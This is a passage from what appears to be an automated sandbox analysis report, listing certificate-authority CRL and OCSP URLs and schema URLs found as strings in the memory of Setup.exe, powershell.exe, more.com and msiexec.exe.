Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000000.00000002.1992948747.000001AD675A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://contoso.com/rdweb/Feed/webfeed.aspx.
Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
              Source: msiexec.exe, 0000000B.00000003.2506550494.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580282480.00000000033F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Setup.exe, 00000003.00000002.1937585678.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.d
              Source: Setup.exe, 00000003.00000002.1937585678.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicer
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: NAudio.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: nca.adml.0.drString found in binary or memory: http://myserver.corp.contoso.com/
              Source: Setup.exe, 00000003.00000002.1937585678.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.c
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: Setup.exe, 0000000C.00000002.2211304501.000000006AE0A000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://python.org/dev/peps/pep-0263/
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctnca.cer09
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD668B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2588541617.0000000004D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com01
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com02
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com05
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certum.pl/CPS0
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.000000000505D000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002D75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
